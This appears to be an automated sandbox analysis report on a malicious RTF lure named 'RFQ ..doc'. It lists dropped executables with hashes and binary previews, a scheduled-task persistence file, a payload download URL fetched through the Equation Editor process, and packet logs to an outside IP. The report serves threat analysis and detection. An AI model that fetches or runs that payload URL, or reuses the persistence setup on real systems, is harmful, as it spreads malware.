                                                                                      Process:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                      Category:dropped
                                                                                      Size (bytes):58596
                                                                                      Entropy (8bit):7.995478615012125
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                      MD5:61A03D15CF62612F50B74867090DBE79
                                                                                      SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                      SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                      SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                      Process:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):326
                                                                                      Entropy (8bit):3.1025948057493555
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:kKf0Sg3cwTJ6YN+SkQlPlEGYRMY9z+4KlDA3RUe0ht:n093cwTJ6HkPlE99SNxAhUe0ht
                                                                                      MD5:C0318F93B5712C946DDB9438135B66D8
                                                                                      SHA1:CD4AAE66D5EE525736AC807D321E120B0E065FF5
                                                                                      SHA-256:E9178E3724C9651A8A4248C85C43F5CC3F78630787403B1127F66E80D8289C15
                                                                                      SHA-512:BCB332A96DC765F20BEF467DDD50C8C1CC39D577F20DF32A1C1B4BBA8D2D3546E902DF67CA8E8BF7E442D6740E30C254F349AAA8BFE7CFFC909230461CAC5326
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: p...... .........`.../..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:downloaded
                                                                                      Size (bytes):733184
                                                                                      Entropy (8bit):7.923340773570457
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:XYMEBDhUzj786IMeIZfFtSyn7CY65s7/k6oHi8UiX67zeAIIHCiUzAnPAG6XecA8:XYMiGJIMBttSyW7sw6tf/cWCiuOPA9eA
                                                                                      MD5:F5F1E2A3E5DCE186EED0352350911887
                                                                                      SHA1:62F0FBF33E6E78AB4A7D7196763CC3DCE62C6A4E
                                                                                      SHA-256:8A3F4202E9F89C018F5C05B15C67898E51DC4D41AD368ABB871E044458F7822D
                                                                                      SHA-512:EFEB10F4406CFD4C553C3546A112744DBAE611CF995E243592C3047562D734B929DA2F3F34BDC029270BF2B4FA93452FAF1E70A1DE68451BC24F917A8F484018
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Reputation:low
                                                                                      IE Cache URL:http://rotronics.com.ph/docxxx/dec/ZhIOjFmINIXbKXm.exe
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P......L......>.... ... ....@.. ....................................@.....................................O.... ...H........................................................................... ............... ..H............text...D.... ...................... ..`.rsrc....H... ...J..................@..@.reloc..............................@..B................ .......H.......$}...v..........<................................................0............(....( .........(.....o!....*.....................("......(#......($......(%......(&....*N..(....o....('....*&..((....*.s)........s*........s+........s,........s-........*....0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0..<........~.....(3.....,!r...p.....(4...o5...s6............~.....+..*.0......
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{73207C3D-FA20-48C4-87C4-17800DB89026}.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.05390218305374581
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EC948C2F-5218-4A38-A66D-F6FECB16C1E9}.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):1.404960705675577
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:OgwBPsgwBPcHdwBPsgwBPp+NNgREqAWlgFJJ1Dlll8vlwjbFwQFrB:OXpsXpcGpsXpmk5uFJJ17uvq/KQZB
                                                                                      MD5:B0AC9A9F74EEBC6FD46C9298256C1184
                                                                                      SHA1:59397E8AC2F9153EBF8057C75A93C0E360C25906
                                                                                      SHA-256:0ED6C085966028181133CFBEBFA28DACF50F805FFA4B754063E6C38331E36641
                                                                                      SHA-512:495D72BCE95702A7748E2C7FDA0E4FC984C709A0252E29DA28D587C55C3627A4B4907C8CA5EABB7288A36C48846BB7D0BAC722D20B6AF212FD022B3863C0C64A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: _.0.5.0.8.5.7.9.8.0.2.2.3.2.0.5.0.8.5.7.9.8.0.2.2.3.2. . . . . . . . . . . . . . . . . . . . . . . . . . . . ._.0.5.0.8.5.7.9.8.0.2.2.3.2.0.5.0.8.5.7.9.8.0.2.2.3.2.=......... .E.q.u.a.t.i.o.n...3.E.M.B.E.D...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ.. .j-..d...CJ..OJ..QJ..U..^J..aJ.
                                                                                      C:\Users\user\AppData\Local\Temp\CabCA24.tmp
                                                                                      Process:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                      Category:dropped
                                                                                      Size (bytes):58596
                                                                                      Entropy (8bit):7.995478615012125
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                      MD5:61A03D15CF62612F50B74867090DBE79
                                                                                      SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                      SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                      SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                      C:\Users\user\AppData\Local\Temp\TarCA25.tmp
                                                                                      Process:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):152788
                                                                                      Entropy (8bit):6.309740459389463
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                                                                      MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                                                                      SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                                                                      SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                                                                      SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                      C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp
                                                                                      Process:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1625
                                                                                      Entropy (8bit):5.159845804541944
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBWtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3C
                                                                                      MD5:175CA2B026C4BC23F57A67426218C6C5
                                                                                      SHA1:E78F633E9D9CD722F1B1F4B0F351DBC9FA5BA919
                                                                                      SHA-256:9982E1EA7AADBD612FFE084EE85F7C51402A44DB9455AE196B722CD7493B0D5F
                                                                                      SHA-512:AD7BA0978725661C6E101C7224BFBD7B82887A37FE04D911B181E148E3EEACABA4FF5164A203DC0F50BA140345B1DBBB1AB9BD075830EC9B38D7CA3C927D4642
                                                                                      Malicious:true
                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RFQ ..LNK
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:18 2020, mtime=Wed Aug 26 14:08:18 2020, atime=Mon Apr 12 20:22:35 2021, length=762054, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1970
                                                                                      Entropy (8bit):4.523449369323646
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:8bVan/XTm6GreVuGULge+ODv3qTadM7dD2bVan/XTm6GreVuGULge+ODv3qTadMj:8bVC/XTFGq44VOQh2bVC/XTFGq44VOQ/
                                                                                      MD5:B231CA8C40641C1CB28222F015C77D93
                                                                                      SHA1:B036AECB37FEF052304F56009CA7679E169E6B3E
                                                                                      SHA-256:D0389794C56D0E9778E76B8189C5E62247D31D112F562D6CB12025D7B6898F29
                                                                                      SHA-512:6C4EE1B943A0DFAE8A3E300D930AEBA95C31281B820CC77CE3BD3C76D33CB7B69873F9FC3F9FAC3433E344916E2608B9A92AA73AE22F9FE2381B90DD1A967181
                                                                                      Malicious:false
                                                                                      Preview: L..................F.... ........{.......{....0../..............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....X.2.....R. .RFQ~1.DOC.@.......Q.y.Q.y*...8.....................R.F.Q. .....d.o.c.......s...............-...8...[............?J......C:\Users\..#...................\\116938\Users.user\Desktop\RFQ ..doc. .....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.F.Q. .....d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......116938..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..............
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):53
                                                                                      Entropy (8bit):4.001070577720336
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:M1I/p2vcp2mX1I/p2v:M6Qco2
                                                                                      MD5:9FFEDA22630354556FE095782F293DC0
                                                                                      SHA1:AE9FF0411E9688BD099F9FC7236596E5E77ADA8E
                                                                                      SHA-256:3405891A68B8A726113FFAD75C4F092351D230B5900B1792322B404498C7BF91
                                                                                      SHA-512:2749C467A85E44F29031B19918C4ED28FD7A98DBB33F6255F61B98EB31216AA3E02D22C1A813D242FB9359DFAC5073847DDEB5566316C236BFCFF9A9D055D4B8
                                                                                      Malicious:false
                                                                                      Preview: [doc]..RFQ ..LNK=0..RFQ ..LNK=0..[doc]..RFQ ..LNK=0..
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):162
                                                                                      Entropy (8bit):2.431160061181642
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                      Malicious:false
                                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                      C:\Users\user\AppData\Roaming\cAFIUeWyVQPJe.exe
                                                                                      Process:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):733184
                                                                                      Entropy (8bit):7.923340773570457
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:XYMEBDhUzj786IMeIZfFtSyn7CY65s7/k6oHi8UiX67zeAIIHCiUzAnPAG6XecA8:XYMiGJIMBttSyW7sw6tf/cWCiuOPA9eA
                                                                                      MD5:F5F1E2A3E5DCE186EED0352350911887
                                                                                      SHA1:62F0FBF33E6E78AB4A7D7196763CC3DCE62C6A4E
                                                                                      SHA-256:8A3F4202E9F89C018F5C05B15C67898E51DC4D41AD368ABB871E044458F7822D
                                                                                      SHA-512:EFEB10F4406CFD4C553C3546A112744DBAE611CF995E243592C3047562D734B929DA2F3F34BDC029270BF2B4FA93452FAF1E70A1DE68451BC24F917A8F484018
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P......L......>.... ... ....@.. ....................................@.....................................O.... ...H........................................................................... ............... ..H............text...D.... ...................... ..`.rsrc....H... ...J..................@..@.reloc..............................@..B................ .......H.......$}...v..........<................................................0............(....( .........(.....o!....*.....................("......(#......($......(%......(&....*N..(....o....('....*&..((....*.s)........s*........s+........s,........s-........*....0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0..<........~.....(3.....,!r...p.....(4...o5...s6............~.....+..*.0......
                                                                                      C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):733184
                                                                                      Entropy (8bit):7.923340773570457
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:XYMEBDhUzj786IMeIZfFtSyn7CY65s7/k6oHi8UiX67zeAIIHCiUzAnPAG6XecA8:XYMiGJIMBttSyW7sw6tf/cWCiuOPA9eA
                                                                                      MD5:F5F1E2A3E5DCE186EED0352350911887
                                                                                      SHA1:62F0FBF33E6E78AB4A7D7196763CC3DCE62C6A4E
                                                                                      SHA-256:8A3F4202E9F89C018F5C05B15C67898E51DC4D41AD368ABB871E044458F7822D
                                                                                      SHA-512:EFEB10F4406CFD4C553C3546A112744DBAE611CF995E243592C3047562D734B929DA2F3F34BDC029270BF2B4FA93452FAF1E70A1DE68451BC24F917A8F484018
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P......L......>.... ... ....@.. ....................................@.....................................O.... ...H........................................................................... ............... ..H............text...D.... ...................... ..`.rsrc....H... ...J..................@..@.reloc..............................@..B................ .......H.......$}...v..........<................................................0............(....( .........(.....o!....*.....................("......(#......($......(%......(&....*N..(....o....('....*&..((....*.s)........s*........s+........s,........s-........*....0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0..<........~.....(3.....,!r...p.....(4...o5...s6............~.....+..*.0......
                                                                                      C:\Users\user\Desktop\~$RFQ ..doc
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):162
                                                                                      Entropy (8bit):2.431160061181642
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                      Malicious:false
                                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:Rich Text Format data, unknown version
                                                                                      Entropy (8bit):4.00285982990663
                                                                                      TrID:
                                                                                      • Rich Text Format (5005/1) 55.56%
                                                                                      • Rich Text Format (4004/1) 44.44%
                                                                                      File name:RFQ ..doc
                                                                                      File size:762054
                                                                                      MD5:8648267830a23e39c5bc162f4ad72f85
                                                                                      SHA1:6a0436200203698fbb93170bb93ddc794d5f968e
                                                                                      SHA256:a1b7cd862762ff80cf95b544e80dfc6f887d9e0e9a8fffeec7c2574812b917d6
                                                                                      SHA512:227289ad31e31b50ebc21d2e3b1f549bf256d97df09ef1824c769d7a5f044e6c666a60fd86969f231efab948dd9c6ef37aa50b4784c0cce7f8e7870976ced828
                                                                                      SSDEEP:12288:SeYGY8R1Fk1P3o5gGJGe2mqWnMJx4+xI3I7t2nWnD8CnU6/t25opkvDA/yl9MEsR:SvGTnFw3o5gCGDpDI3IfDtl250SAA9Mx
                                                                                      File Content Preview:{\rtf978{\object15077571\objhtml\objw9484\objh7736{\*\objdata152613{\qmspace0508579802232.0508579802232\.0508579802232 \qmspace0508579802232.0508579802232\.0508579802232} \..

                                                                                      File Icon

                                                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                                                      Static RTF Info

                                                                                      Objects

                                                                                      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                      00000003Fhno

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 12, 2021 14:22:57.334988117 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.463363886 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.463500023 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.464476109 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.592809916 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.597677946 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.597707987 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.597721100 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.597733974 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.597745895 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.597763062 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.597780943 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.597791910 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.597803116 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.597807884 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.597837925 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.597842932 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.597846031 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.597847939 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.597851038 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.597853899 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.598011017 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.598129034 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.601902008 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.726089001 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.726129055 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.726151943 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.726178885 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.726206064 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.726233959 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.726263046 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.726296902 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.726306915 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.726325989 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.726340055 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.726346016 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.726351976 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.726356030 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.726361036 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.726394892 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.726409912 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.726433992 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.726469994 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.726486921 CEST4916780192.168.2.22203.167.7.88
